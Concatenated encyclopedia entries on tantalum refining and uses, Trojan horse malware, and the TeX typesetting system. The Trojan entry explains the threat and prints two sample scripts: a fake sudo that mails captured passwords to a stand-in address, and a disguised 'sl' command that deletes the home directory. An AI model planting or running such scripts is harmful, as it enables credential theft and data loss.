metallurgy. The chief problem is that tantalum ores contain significant amounts of niobium, which has chemical properties almost identical to those of Ta. A large number of procedures have been developed to address this challenge. 
In modern times, the separation is achieved by hydrometallurgy. Extraction begins with leaching the ore with hydrofluoric acid together with sulfuric acid or hydrochloric acid. This step allows the tantalum and niobium to be separated from the various non-metallic impurities in the rock. Although Ta occurs as various minerals, it is conveniently represented as the pentoxide, since most oxides of tantalum(V) behave similarly under these conditions. A simplified equation for its extraction is thus: Ta2O5 + 14 HF → 2 H2[TaF7] + 5 H2O Completely analogous reactions occur for the niobium component, but the hexafluoride is typically predominant under the conditions of the extraction. Nb2O5 + 12 HF → 2 H[NbF6] + 5 H2O These equations are simplified: it is suspected that bisulfate (HSO4−) and chloride compete as ligands for the Nb(V) and Ta(V) ions, when sulfuric and hydrochloric acids are used, respectively. The tantalum and niobium fluoride complexes are then removed from the aqueous solution by liquid-liquid extraction into organic solvents, such as cyclohexanone, octanol, and methyl isobutyl ketone. This simple procedure allows the removal of most metal-containing impurities (e.g. iron, manganese, titanium, zirconium), which remain in the aqueous phase in the form of their fluorides and other complexes. Separation of the tantalum from niobium is then achieved by lowering the ionic strength of the acid mixture, which causes the niobium to dissolve in the aqueous phase. It is proposed that the oxyfluoride H2[NbOF5] is formed under these conditions. Subsequent to removal of the niobium, the solution of purified H2[TaF7] is neutralised with aqueous ammonia to precipitate hydrated tantalum oxide as a solid, which can be calcined to tantalum pentoxide (Ta2O5). Instead of hydrolysis, the H2[TaF7] can be treated with potassium fluoride to produce potassium heptafluorotantalate: H2[TaF7] + 2 KF → K2[TaF7] + 2 HF Unlike H2[TaF7], the potassium salt is readily crystallized and handled as a solid. K2[TaF7] can be converted to metallic tantalum by reduction with sodium, at approximately 800 °C in molten salt. K2[TaF7] + 5 Na → Ta + 5 NaF + 2 KF In an older method, called the Marignac process, the mixture of H2[TaF7] and H2[NbOF5] was converted to a mixture of K2[TaF7] and K2[NbOF5], which was then separated by fractional crystallization, exploiting their different water solubilities. Electrolysis Tantalum can also be refined by electrolysis, using a modified version of the Hall–Héroult process. Instead of requiring the input oxide and output metal to be in liquid form, tantalum electrolysis operates on non-liquid powdered oxides. The initial discovery came in 1997 when Cambridge University researchers immersed small samples of certain oxides in baths of molten salt and reduced the oxide with electric current. The cathode uses powdered metal oxide. The anode is made of carbon. The molten salt is the electrolyte. The first refinery has enough capacity to supply 3–4% of annual global demand. Fabrication and metalworking All welding of tantalum must be done in an inert atmosphere of argon or helium in order to shield it from contamination with atmospheric gases. Tantalum is not solderable. Grinding tantalum is difficult, especially so for annealed tantalum. In the annealed condition, tantalum is extremely ductile and can be readily formed as metal sheets. 
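As a back-of-the-envelope illustration of the sodium reduction step in the Refining section above, the sketch below estimates the sodium consumed per kilogram of tantalum from the balanced equation (standard atomic masses assumed; a real plant would use an excess of sodium):

```python
# Stoichiometry sketch for K2[TaF7] + 5 Na -> Ta + 5 NaF + 2 KF:
# five moles of sodium are consumed per mole of tantalum produced.
M_NA = 22.99    # molar mass of sodium, g/mol
M_TA = 180.95   # molar mass of tantalum, g/mol

na_per_ta = 5 * M_NA / M_TA                              # g of Na per g of Ta
print(f"{na_per_ta * 1000:.0f} g of sodium per kg of tantalum")  # ~635 g
```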
Applications Electronics The major use for tantalum, as the metal powder, is in the production of electronic components, mainly capacitors and some high-power resistors. Tantalum electrolytic capacitors exploit the tendency of tantalum to form a protective oxide surface layer, using tantalum powder, pressed into a pellet shape, as one "plate" of the capacitor, the oxide as the dielectric, and an electrolytic solution or conductive solid as the other "plate". Because the dielectric layer can be very thin (thinner than the similar layer in, for instance, an aluminium electrolytic capacitor), a high capacitance can be achieved in a small volume. Because of the size and weight advantages, tantalum capacitors are attractive for portable telephones, personal computers, automotive electronics and cameras. Alloys Tantalum is also used to produce a variety of alloys that have high melting points, strength, and ductility. Alloyed with other metals, it is also used in making carbide tools for metalworking equipment and in the production of superalloys for jet engine components, chemical process equipment, nuclear reactors, missile parts, heat exchangers, tanks, and vessels. Because of its ductility, tantalum can be drawn into fine wires or filaments, which are used for evaporating metals such as aluminium. Tantalum is inert against most acids except hydrofluoric acid and hot sulfuric acid, and hot alkaline solutions also cause tantalum to corrode. This property makes it a useful metal for chemical reaction vessels and pipes for corrosive liquids. Heat-exchanging coils for the steam heating of hydrochloric acid are made from tantalum. Tantalum was extensively used in the production of ultra-high-frequency electron tubes for radio transmitters. Tantalum is capable of capturing oxygen and nitrogen by forming nitrides and oxides and therefore helped to sustain the high vacuum needed for the tubes when used for internal parts such as grids and plates. Surgical uses Medical researcher Gerald L. Burke at the Los Angeles Orthopaedic Hospital first discovered in 1938 that tantalum is bio-inert in human tissue and could be used safely as an orthopaedic implant material. Burke also demonstrated what is perhaps tantalum's other most appreciated characteristic in surgical procedures: tantalum will permanently bond to bone with no degradation of the surrounding bone. Later, Burke's team, working with a team from the California Institute of Technology led by John Norton Wilson, showed that tantalum, while hard enough to be fabricated into surgical tools, could also be fabricated in a form sufficiently ductile, yet still sufficiently strong, to be drawn into fine threads that could be used for non-scarring sutures. Burke's team in 1940 was the first to propose the use of tantalum for arthroplasty procedures, the repair of intertrochanteric fractures, and for jaw repairs and dental implants. Burke's initial biological research results were confirmed and credited in greater detail by the Harvard Medical School in a series of neurological experiments using powdered tantalum implants. More than 50 years later, researchers were still refining and documenting their understanding of the basic surgical procedures developed by Burke after his pioneering discoveries. Nowadays, in spite of the cost, tantalum is still widely used in making surgical instruments and implants, and new procedures continue to be developed. 
For example, porous tantalum coatings are used in the construction of titanium implants due to tantalum's exceptional ability to form a direct bond to hard tissue. Because tantalum is a non-ferrous, non-magnetic metal, tantalum implants are considered to be acceptable for patients undergoing MRI procedures. Other uses Tantalum was used by NASA to shield components of spacecraft, such as Voyager 1 and Voyager 2, from radiation. The high melting point and oxidation resistance led to the use of the metal in the production of vacuum furnace parts. Tantalum is extremely inert and is therefore formed into a variety of corrosion resistant parts, such as thermowells, valve bodies, and tantalum fasteners. Due to its high density, shaped charge and explosively formed penetrator liners have been constructed from tantalum. Tantalum greatly increases the armor penetration capabilities of a shaped charge due to its high density and high melting point. It is also occasionally used in precious watches e.g. from Audemars Piguet, F.P. Journe, Hublot, Montblanc, Omega, and Panerai. Tantalum oxide is used to make special high refractive index glass for camera lenses. Spherical tantalum powder, produced by atomizing molten tantalum using gas or liquid, is commonly used in additive manufacturing due to its uniform shape, excellent flowability, and high melting point. Environmental issues Tantalum receives far less attention in the environmental field than it does in other geosciences. Upper Crust Concentration (UCC) and the Nb/Ta ratio in the upper crust and in minerals are available because these measurements are useful as a geochemical tool. The latest value for upper crust concentration is 0.92 ppm, and the Nb/Ta(w/w) ratio stands at 12.7. Little data is available on tantalum concentrations in the different environmental compartments, especially in natural waters where reliable estimates of ‘dissolved’ tantalum concentrations in seawater and freshwaters have not even been produced. Some values on dissolved concentrations in oceans have been published, but they are contradictory. Values in freshwaters fare little better, but, in all cases, they are probably below 1 ng L−1, since ‘dissolved’ concentrations in natural waters are well below most current analytical capabilities. Analysis requires pre-concentration procedures that, for the moment, do not give consistent results. And in any case, tantalum appears to be present in natural waters mostly as particulate matter rather than dissolved. Values for concentrations in soils, bed sediments and atmospheric aerosols are easier to come by. Values in soils are close to 1 ppm and thus to UCC values. This indicates detrital origin. For atmospheric aerosols the values available are scattered and limited. When tantalum enrichment is observed, it is probably due to loss of more water-soluble elements in aerosols in the clouds. Pollution linked to human use of the element has not been detected. Tantalum appears to be a very conservative element in biogeochemical terms, but its cycling and reactivity are still not fully understood. Precautions Compounds containing tantalum are rarely encountered in the laboratory. The metal is highly biocompatible and is used for body implants and coatings, therefore attention may be focused on other elements or the physical nature of the chemical compound. People can be exposed to tantalum in the workplace by breathing it in, skin contact, or eye contact. 
The Occupational Safety and Health Administration (OSHA) has set the legal limit (permissible exposure limit) for tantalum exposure in the workplace as 5 mg/m3 over an 8-hour workday. The National Institute for Occupational Safety and Health (NIOSH) has set a recommended exposure limit (REL) of 5 mg/m3 over an 8-hour workday and a short-term limit of 10 mg/m3. At levels of 2500 mg/m3, tantalum dust is immediately dangerous to life and health.
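As a closing illustration of the volumetric advantage described under Electronics, here is a minimal parallel-plate estimate; the relative permittivity of about 27 for Ta2O5 and the 20 nm film thickness are assumed illustrative values, not figures from this article:

```python
# Parallel-plate estimate of capacitance per unit area for a thin
# anodic Ta2O5 dielectric: C/A = eps0 * eps_r / d.
EPS0 = 8.854e-12      # vacuum permittivity, F/m
EPS_R_TA2O5 = 27      # assumed relative permittivity of Ta2O5
THICKNESS_M = 20e-9   # assumed oxide thickness: 20 nm

cap_per_m2 = EPS0 * EPS_R_TA2O5 / THICKNESS_M   # F per square metre
cap_per_cm2 = cap_per_m2 / 1e4                  # F per square centimetre
print(f"{cap_per_cm2 * 1e6:.1f} microfarads per square centimetre")  # ~1.2 uF/cm^2
```

Even this crude estimate gives on the order of a microfarad per square centimetre of anodized surface, which is why a porous sintered pellet with a large internal surface area packs a high capacitance into a small volume.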
Physical sciences
Chemical elements_2
null
30056
https://en.wikipedia.org/wiki/Trojan%20horse%20%28computing%29
Trojan horse (computing)
In computing, a Trojan horse (or simply Trojan) is any malware that misleads users of its true intent by disguising itself as a normal program. The term is derived from the ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy. Trojans are generally spread by some form of social engineering: for example, a user may be duped into executing an email attachment disguised to appear innocuous (e.g., a routine form to be filled in), or into clicking on a fake advertisement on the Internet. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller who can then gain unauthorized access to the affected device. Ransomware attacks are often carried out using a Trojan. Unlike computer viruses and worms, Trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves.

Use of the term
It is not clear where or when the concept, and this term for it, was first used, but by 1971 the first Unix manual assumed its readers knew both. Another early reference is in a 1974 US Air Force report on the analysis of vulnerability in the Multics computer systems. The term was made popular by Ken Thompson in his 1983 Turing Award acceptance lecture "Reflections on Trusting Trust", subtitled: "To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software." He mentioned that he knew about the possible existence of Trojans from a report on the security of Multics.

Behavior
Once installed, Trojans may perform a range of malicious actions. Many tend to contact one or more Command and Control (C2) servers across the Internet and await instruction. Since individual Trojans typically use a specific set of ports for this communication, it can be relatively simple to detect them. Moreover, other malware could potentially "take over" the Trojan, using it as a proxy for malicious action. In German-speaking countries, spyware used or made by the government is sometimes called govware. Govware is typically Trojan software used to intercept communications from the target device. Some countries, such as Switzerland and Germany, have a legal framework governing the use of such software. Examples of govware Trojans include the Swiss MiniPanzer and MegaPanzer and the German "state Trojan" nicknamed R2D2. German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted by other applications. Due to the popularity of botnets among hackers and the availability of advertising services that permit authors to violate their users' privacy, Trojans are becoming more common. According to a survey conducted by BitDefender from January to June 2009, "Trojan-type malware is on the rise, accounting for 83% of the global malware detected in the world." Trojans have a relationship with worms, as they can spread with the help of worms and travel across the internet with them. BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a Trojan infection. Recent investigations have revealed that the Trojan horse method has been used as an attack on cloud computing systems. A Trojan attack on cloud systems tries to insert an application or service into the system that can impact the cloud services by changing or stopping their functionality.
When the cloud system identifies the attack as a legitimate service or application, it is executed, which can damage and infect the cloud system.

Linux sudo example
A Trojan horse is a program that purports to perform some legitimate function, yet upon execution it compromises the user's security. A simple example is the following malicious version of the Linux sudo command. An attacker would place this script in a publicly writable directory (e.g., /tmp). If an administrator happens to be in this directory and executes sudo, then the Trojan may execute, compromising the administrator's password.

#!/usr/bin/env bash

# Turn off the character echo to the screen. sudo does this to prevent the
# user's password from appearing on screen when they type it in.
stty -echo

# Prompt user for password and then read input.
# To disguise the nature of this malicious version, do this 3 times to
# imitate the behavior of sudo when a user enters the wrong password.
prompt_count=1
while [ $prompt_count -le 3 ]; do
    echo -n "[sudo] password for $(whoami): "
    read password_input
    echo
    sleep 3 # sudo will pause between repeated prompts
    prompt_count=$(( prompt_count + 1 ))
done

# Turn the character echo back on.
stty echo

# Mail the captured password to the attacker.
echo $password_input | mail -s "$(whoami)'s password" outside@creep.com

# Display sudo's actual error message and then delete self.
echo "sudo: 3 incorrect password attempts"
rm $0
exit 1 # sudo returns 1 with a failed password attempt

To prevent a sudo Trojan horse of this kind, set the . entry in the PATH environment variable to be located at the tail end. For example:

PATH=/usr/local/bin:/usr/bin:.

Linux ls example
Having . somewhere in the PATH is convenient, but there is a catch. Another example is the following malicious version of the Linux ls command. However, the filename is not ls; instead, it is sl, anticipating a common typing mistake. An attacker would place this script in a publicly writable directory (e.g., /tmp).

#!/usr/bin/env bash

# Remove the user's home directory, then remove self.
rm -fr ~ 2>/dev/null
rm $0

To guard against this common typing mistake being exploited, omit . from the PATH entirely, or define the alias sl=ls.

Notable examples

Private and governmental
ANOM – FBI
0zapftis / r2d2 StaatsTrojaner – DigiTask
FinFisher – Lench IT solutions / Gamma International
DaVinci / Galileo RCS – HackingTeam
Magic Lantern – FBI
SUNBURST – SVR/Cozy Bear (suspected)
TAO QUANTUM/FOXACID – NSA
WARRIOR PRIDE – GCHQ

Publicly available
EGABTR – late 1980s
Netbus – 1998 (published)
Sub7 by Mobman – 1999 (published)
Back Orifice – 1998 (published)
Y3K by Tselentis brothers – 2000 (published)
Beast – 2002 (published)
Bifrost Trojan – 2004 (published)
DarkComet – 2008–2012 (published)
Blackhole exploit kit – 2012 (published)
Gh0st RAT – 2009 (published)
MegaPanzer BundesTrojaner – 2009 (published)
MEMZ by Leurak – 2016 (published)

Detected by security researchers
Twelve Tricks – 1990
Clickbot.A – 2006 (discovered)
Zeus – 2007 (discovered)
Flashback Trojan – 2011 (discovered)
ZeroAccess – 2011 (discovered)
Koobface – 2008 (discovered)
Vundo – 2009 (discovered)
Coreflood – 2010 (discovered)
Tiny Banker Trojan – 2012 (discovered)
Wirelurker – 2014 (discovered)
SOVA – 2022 (discovered)
Shedun Android malware – 2015 (discovered)

Capitalization
The computer term "Trojan horse" is derived from the legendary Trojan Horse of the ancient city of Troy. For this reason, "Trojan" is often capitalized. However, while style guides and dictionaries differ, many suggest a lower case "trojan" for normal use.
Technology
Computer security
null
30065
https://en.wikipedia.org/wiki/TeX
TeX
TeX (see Pronunciation and spelling below), stylized within the system with a lowered "E", is a typesetting program which was designed and written by computer scientist and Stanford University professor Donald Knuth and first released in 1978. The term now refers to the system of extensions – which includes software programs called TeX engines, sets of TeX macros, and packages which provide extra typesetting functionality – built around the original TeX language. TeX is a popular means of typesetting complex mathematical formulae; it has been noted as one of the most sophisticated digital typographical systems. TeX is widely used in academia, especially in mathematics, computer science, economics, political science, engineering, linguistics, physics, statistics, and quantitative psychology. It has long since displaced Unix troff, the previously favoured formatting system, in most Unix installations. It is also used for many other typesetting tasks, especially in the form of LaTeX, ConTeXt, and other macro packages. TeX was designed with two main goals in mind: to allow anybody to produce high-quality books with minimal effort, and to provide a system that would give exactly the same results on all computers, at any point in time (together with the Metafont language for font description and the Computer Modern family of typefaces). TeX is free software, which made it accessible to a wide range of users.

History
When the first paper volume of Knuth's The Art of Computer Programming was published in 1968, it was typeset using hot metal typesetting on a Monotype machine. This method, dating back to the 19th century, produced a "classic style" appreciated by Knuth. When the second edition was published, in 1976, the whole book had to be typeset again because the Monotype technology had been largely replaced by phototypesetting, and the original fonts were no longer available. When Knuth received the galley proofs of the new book on 30 March 1977, he found them inferior. Around this time, Knuth saw for the first time the output of a high-quality digital typesetting system and became interested in digital typography. Disappointed by the galley proofs, he set out to design his own typesetting system. On 13 May 1977, he wrote a memo to himself describing the basic features of TeX. He planned to finish it on his sabbatical in 1978, but as it happened, the language was not "frozen" (ready to use) until 1989, more than ten years later. Guy Steele happened to be at Stanford during the summer of 1978, when Knuth was developing his first version of TeX. When Steele returned to the Massachusetts Institute of Technology that autumn, he rewrote TeX's input/output (I/O) to run under the Incompatible Timesharing System (ITS) operating system. The first version of TeX, called TeX78, was written in the SAIL programming language to run on a PDP-10 under Stanford's WAITS operating system.

WEB and literate programming
For later versions of TeX, Knuth invented the concept of literate programming, a way of producing compilable source code and cross-linked documentation typeset in TeX from the same original file. The language used is called WEB and produces programs in DEC PDP-10 Pascal.

TeX82
TeX82, a new version of TeX rewritten from scratch, was published in 1982. Among other changes, the original hyphenation algorithm was replaced by a new algorithm written by Frank Liang.
TeX82 also uses fixed-point arithmetic instead of floating-point, to ensure reproducibility of the results across different computer hardware, and includes a real, Turing-complete programming language, following intense lobbying by Guy Steele. In 1989, Donald Knuth released new versions of TeX and Metafont. Despite his desire to keep the program stable, Knuth realized that 128 different characters for the text input were not enough to accommodate foreign languages; the main change in version 3.0 of TeX is thus the ability to work with 8-bit inputs, allowing 256 different characters in the text input. TeX 3.0 was released on March 15, 1990.

Since version 3, TeX has used an idiosyncratic version numbering system, where updates have been indicated by adding an extra digit at the end of the decimal, so that the version number asymptotically approaches π. This is a reflection of the fact that TeX is now very stable, and only minor updates are anticipated. The current version of TeX is 3.141592653; it was last updated in 2021. The design was frozen after version 3.0, and no new feature or fundamental change will be added, so all newer versions will contain only bug fixes. Even though Donald Knuth himself has suggested a few areas in which TeX could have been improved, he indicated that he firmly believes that having an unchanged system that will produce the same output now and in the future is more important than introducing new features. For this reason, he has stated that the "absolutely final change (to be made after my death)" will be to change the version number to π, at which point all remaining bugs will become features. Likewise, versions of Metafont after 2.0 asymptotically approach e (currently 2.7182818), and a similar change will be applied after Knuth's death.

Public domain
Since the source code of TeX is essentially in the public domain (see below), other programmers are allowed (and explicitly encouraged) to improve the system, but are required to use another name to distribute the modified TeX, meaning that the source code can still evolve. For example, the Omega project was developed after 1991, primarily to enhance TeX's multilingual typesetting abilities. Knuth created "unofficial" modified versions, such as TeX-XeT, which allows a user to mix texts written in left-to-right and right-to-left writing systems in the same document.

Use of TeX
In several technical fields such as computer science, mathematics, engineering and physics, TeX has become a de facto standard. Many thousands of books have been published using TeX, including books published by Addison-Wesley, Cambridge University Press, Elsevier, Oxford University Press, and Springer. Numerous journals in these fields are produced using TeX or LaTeX, allowing authors to submit their raw manuscript written in TeX. While many publications in other fields, including dictionaries and legal publications, have been produced using TeX, it has not been as successful as in the more technical fields, as TeX was primarily designed to typeset mathematics. When he designed TeX, Donald Knuth did not believe that a single typesetting system would fit everyone's needs; instead, he designed many hooks inside the program so that it would be possible to write extensions, and released the source code, hoping that publishers would design versions tailored to their own needs.
While such extensions have been created (including some by Knuth himself), most people have extended TeX only using macros and it has remained a system associated with technical typesetting.

Typesetting system
TeX commands commonly start with a backslash and are grouped with curly braces. Almost all of TeX's syntactic properties can be changed on the fly, which makes TeX input hard to parse by anything but TeX itself. TeX is a macro- and token-based language: many commands, including most user-defined ones, are expanded on the fly until only unexpandable tokens remain, which are then executed. Expansion itself is practically free from side effects. Tail recursion of macros takes no memory, and if-then-else constructs are available. This makes TeX a Turing-complete language even at the expansion level.

The system can be divided into four levels: in the first, characters are read from the input file and assigned a category code (sometimes called "catcode", for short). Combinations of a backslash (actually, any character of category zero) followed by letters (characters of category 11) or a single other character are replaced by a control-sequence token. In this sense, this stage is like lexical analysis, although it does not form numbers from digits. In the next stage, expandable control sequences (such as conditionals or defined macros) are replaced by their replacement text. The input for the third stage is then a stream of characters (including the ones with special meaning) and unexpandable control sequences (typically assignments and visual commands). Here, the characters get assembled into a paragraph, and TeX's paragraph breaking algorithm works by optimizing breakpoints over the whole paragraph. The fourth stage breaks the vertical list of lines and other material into pages. The TeX system has precise knowledge of the sizes of all characters and symbols, and using this information, it computes the optimal arrangement of letters per line and lines per page. It then produces a DVI file ("DeVice Independent") containing the final locations of all characters. This DVI file can then be printed directly given an appropriate printer driver, or it can be converted to other formats. Nowadays, pdfTeX is often used, which bypasses DVI generation altogether.

The base TeX system understands about 300 commands, called primitives. These low-level commands are rarely used directly by users, and most functionality is provided by format files (predumped memory images of TeX after large macro collections have been loaded). Knuth's original default format, which adds about 600 commands, is Plain TeX. The most widely used format is LaTeX, originally developed by Leslie Lamport, which incorporates document styles for books, letters, slides, etc., and adds support for referencing and automatic numbering of sections and equations. Another widely used format, AMS-TeX, is produced by the American Mathematical Society and provides many more user-friendly commands, which can be altered by journals to fit with their house style. Most of the features of AMS-TeX can be used in LaTeX by using the "AMS packages" (e.g., amsmath, amssymb) and the "AMS document classes" (e.g., amsart, amsbook). This is then referred to as AMS-LaTeX. Other formats include ConTeXt, used primarily for desktop publishing and written mostly by Hans Hagen at Pragma.
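The first of the four stages described above, the lexer-like assignment of category codes, can be sketched in a few lines of Python. This is a deliberately simplified illustration, not TeX's actual implementation: the category table is hard-coded, only categories 0 (escape) and 11 (letters) are modelled, and real TeX also skips spaces after a control word, which is omitted here.

import re

# Simplified sketch of TeX's first stage: characters become character tokens,
# and a backslash (category 0) followed by letters (category 11), or by one
# other character, becomes a single control-sequence token.
LETTERS = re.compile(r'[A-Za-z]+')

def tokenize(source):
    tokens = []
    i = 0
    while i < len(source):
        ch = source[i]
        if ch == '\\' and i + 1 < len(source):
            m = LETTERS.match(source, i + 1)
            if m:  # control word, e.g. \bye
                tokens.append(('control-sequence', m.group()))
                i = m.end()
            else:  # control symbol, e.g. \$
                tokens.append(('control-sequence', source[i + 1]))
                i += 2
        else:
            tokens.append(('character', ch))
            i += 1
    return tokens

print(tokenize(r'Hello \TeX!'))
# [('character', 'H'), ..., ('control-sequence', 'TeX'), ('character', '!')]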
How it is run
A sample Hello world program in plain TeX is:

Hello, World
\bye % marks the end of the file; not shown in the final output

This might be in a file myfile.tex, as .tex is a common file extension for plain TeX files. By default, everything that follows a percent sign on a line is a comment, ignored by TeX. Running TeX on this file (for example, by typing tex myfile.tex in a command-line interpreter, or by calling it from a graphical user interface) will create an output file called myfile.dvi, representing the content of the page in a device independent format (DVI). A DVI file could then be either viewed on screen or converted to a suitable format for any of the various printers for which a device driver existed (printer support was generally not an operating system feature at the time that TeX was created). Knuth has said that there is nothing inherent in TeX that requires DVI as the output format, and later versions of TeX, notably pdfTeX, XeTeX, and LuaTeX, all support output directly to PDF.

Mathematical example
TeX provides a different text syntax specifically for mathematical formulas. For example, the quadratic formula (which is the solution of the quadratic equation) can be written in TeX syntax as:

x = {-b \pm \sqrt{b^2 - 4ac} \over 2a}

The formula is printed in a way a person would write it by hand, or typeset it. In a document, entering mathematics mode is done by starting with a $ symbol, then entering a formula in TeX syntax, and closing again with another of the same symbol. Knuth explained in jest that he chose the dollar sign to indicate the beginning and end of mathematical mode in plain TeX because typesetting mathematics was traditionally supposed to be expensive. Display mathematics (mathematics presented centred on a new line) is similar but uses $$ instead of a single $ symbol. For example, the above with the quadratic formula in display math:

$$x = {-b \pm \sqrt{b^2 - 4ac} \over 2a}$$

(The examples here are not actually rendered with TeX; spacing, character sizes, and all else may differ.)

Aspects
The TeX software incorporates several aspects that were not available, or were of lower quality, in other typesetting programs at the time when TeX was released. Some of the innovations are based on interesting algorithms, and have led to several theses for Knuth's students. While some of these discoveries have now been incorporated into other typesetting programs, others, such as the rules for mathematical spacing, are still unique.

Mathematical spacing
Since the primary goal of the TeX language is high-quality typesetting for publishers of books, Knuth gave a lot of attention to the spacing rules for mathematical formulae. He took three bodies of work that he considered to be standards of excellence for mathematical typography: the books typeset by the Addison-Wesley Publishing house (the publisher of The Art of Computer Programming) under the supervision of Hans Wolf; editions of the mathematical journal Acta Mathematica dating from around 1910; and a copy of Indagationes Mathematicae, a Dutch mathematics journal. Knuth looked closely at these printed works to derive a set of rules for spacing. While TeX provides some basic rules and the tools needed to specify proper spacing, the exact parameters depend on the font used to typeset the formula. For example, the spacing for Knuth's Computer Modern fonts has been precisely fine-tuned over the years and is now set; but when other fonts, such as AMS Euler, were used by Knuth for the first time, new spacing parameters had to be defined.
The typesetting of math in TeX is not without criticism, particularly with respect to technical details of the font metrics, which were designed in an era when significant attention was paid to storage requirements. This resulted in some "hacks" overloading some fields, which in turn required other "hacks". On an aesthetic level, the rendering of radicals has also been criticized. The OpenType math font specification largely borrows from TeX, but has some new features/enhancements.

Hyphenation and justification
In comparison with manual typesetting, the problem of justification is easy to solve with a digital system such as TeX, which, provided that good points for line breaking have been defined, can automatically spread the spaces between words to fill in the line. The problem is thus to find the set of breakpoints that will give the most visually pleasing result. Many line-breaking algorithms use a first-fit approach, where the breakpoints for each line are determined one after the other, and no breakpoint is changed after it has been chosen. Such a system is not able to define a breakpoint depending on the effect that it will have on the following lines. In comparison, the total-fit line-breaking algorithm used by TeX and developed by Donald Knuth and Michael Plass considers all the possible breakpoints in a paragraph, and finds the combination of line breaks that will produce the most globally pleasing arrangement. Formally, the algorithm defines a value called badness associated with each possible line break; the badness is increased if the spaces on the line must stretch or shrink too much to make the line the correct width. Penalties are added if a breakpoint is particularly undesirable: for example, if a word must be hyphenated, if two lines in a row are hyphenated, or if a very loose line is immediately followed by a very tight line. The algorithm will then find the breakpoints that will minimize the sum of squares of the badness (including penalties) of the resulting lines. If the paragraph contains n possible breakpoints, the number of situations that must be evaluated naively is 2^n. However, by using the method of dynamic programming, the complexity of the algorithm can be brought down to O(n^2) (see Big O notation). Further simplifications (for example, not testing extremely unlikely breakpoints such as a hyphenation in the first word of a paragraph, or very overfull lines) lead to an efficient algorithm whose running time is O(nw), where w is the width of a line. A similar algorithm is used to determine the best way to break paragraphs across two pages, in order to avoid widows or orphans (lines that appear alone on a page while the rest of the paragraph is on the following or preceding page). However, in general, a thesis by Michael Plass shows how the page-breaking problem can be NP-complete because of the added complication of placing figures. TeX's line-breaking algorithm has been adopted by several other programs, such as Adobe InDesign (a desktop publishing application) and the GNU fmt Unix command line utility. If no suitable line break can be found for a line, the system will try to hyphenate a word. The original version of TeX used a hyphenation algorithm based on a set of rules for the removal of prefixes and suffixes of words, and for deciding if it should insert a break between the two consonants in a pattern of the form vowel–consonant–consonant–vowel (which is possible most of the time).
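The badness-minimisation idea described above can be made concrete with a toy sketch. The Python below is an illustration only, not Knuth and Plass's actual algorithm: real TeX measures glue stretch and shrink in printer's points and adds separate penalty terms, whereas here the cost of a line is simply the square of its leftover character slack, minimised over the whole paragraph by dynamic programming (via memoisation), in the spirit of the total-fit approach.

import math
from functools import lru_cache

# Toy total-fit line breaker. Words are placed on lines of a fixed character
# width; the cost of a line is its squared leftover space, and the total cost
# over the paragraph is minimised. Assumes no single word exceeds line_width.
def break_paragraph(words, line_width):
    n = len(words)

    def line_cost(i, j):
        # Cost of putting words[i:j] on one line; infinite if they do not fit.
        length = sum(len(w) for w in words[i:j]) + (j - i - 1)  # words + spaces
        if length > line_width:
            return math.inf
        if j == n:  # the last line may be short at no cost
            return 0
        return (line_width - length) ** 2

    @lru_cache(maxsize=None)
    def best(i):
        # Minimal total cost of setting words[i:], plus the chosen line ends.
        if i == n:
            return (0, ())
        options = []
        for j in range(i + 1, n + 1):
            cost = line_cost(i, j)
            if cost == math.inf:
                break  # adding more words only makes the line longer
            rest_cost, rest_breaks = best(j)
            options.append((cost + rest_cost, (j,) + rest_breaks))
        return min(options)

    _, breaks = best(0)
    lines, start = [], 0
    for j in breaks:
        lines.append(' '.join(words[start:j]))
        start = j
    return lines

for line in break_paragraph(
        'the total-fit algorithm considers all possible breakpoints in a paragraph'.split(), 24):
    print(line)

Because best(i) depends only on the suffix starting at word i, memoisation reduces the naive exponential search to polynomial time, mirroring the dynamic-programming observation made above.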
TeX82 introduced a new hyphenation algorithm, designed by Frank Liang in 1983, to assign priorities to breakpoints in letter groups. A list of hyphenation patterns is first generated automatically from a corpus of hyphenated words (a list of 50,000 words). If TeX must find the acceptable hyphenation positions in the word encyclopedia, for example, it will consider all the subwords of the extended word .encyclopedia., where . is a special marker to indicate the beginning or end of the word. The list of subwords includes all the subwords of length 1 (., e, n, c, y, etc.), of length 2 (.e, en, nc, etc.), etc., up to the subword of length 14, which is the word itself, including the markers. TeX will then look into its list of hyphenation patterns, and find subwords for which it has calculated the desirability of hyphenation at each position. In the case of this word, 11 such patterns can be matched, namely 1c4l4, 1cy, 1d4i3a, 4edi, e3dia, 2i1a, ope5d, 2p2ed, 3pedi, pedia4, y1c. For each position in the word, TeX will calculate the maximum value obtained among all matching patterns, yielding en1cy1c4l4o3p4e5d4i3a4. Finally, the acceptable positions are those indicated by an odd number, yielding the acceptable hyphenations en-cy-clo-pe-di-a. This system based on subwords allows the definition of very general patterns (such as 2i1a), with low indicative numbers (either odd or even), which can then be superseded by more specific patterns (such as 1d4i3a) if necessary. These patterns find about 90% of the hyphens in the original dictionary; more importantly, they do not insert any spurious hyphen. In addition, a list of exceptions (words for which the patterns do not predict the correct hyphenation) is included with the Plain TeX format; additional ones can be specified by the user.

Metafont
Metafont, not strictly part of TeX, is a font description system which allows the designer to describe characters algorithmically. It uses Bézier curves in a fairly standard way to generate the actual characters to be displayed, but Knuth devotes substantial attention to the rasterizing problem on bitmapped displays. Another thesis, by John Hobby, further explores this problem of digitizing "brush trajectories". This term derives from the fact that Metafont describes characters as having been drawn by abstract brushes (and erasers). It is commonly believed that TeX is based on bitmap fonts but, in fact, these programs "know" nothing about the fonts that they are using other than their dimensions. It is the responsibility of the device driver to appropriately handle fonts of other types, including PostScript Type 1 and TrueType. Computer Modern (commonly known as "the TeX font") is freely available in Type 1 format, as are the AMS math fonts. Users of TeX systems that output directly to PDF, such as pdfTeX, XeTeX, or LuaTeX, generally never use Metafont output at all.

Macro language
TeX documents are written and programmed using an unusual macro language. Broadly speaking, the running of this macro language involves expansion and execution stages which do not interact directly. Expansion includes both literal expansion of macro definitions as well as conditional branching, and execution involves such tasks as setting variables/registers and the actual typesetting process of adding glyphs to boxes. The definition of a macro not only includes a list of commands but also the syntax of the call.
It differs from most widely used lexical preprocessors, such as M4, in that the body of a macro gets tokenized at definition time. The TeX macro language has been used to write larger document production systems, most notably including LaTeX and ConTeXt.
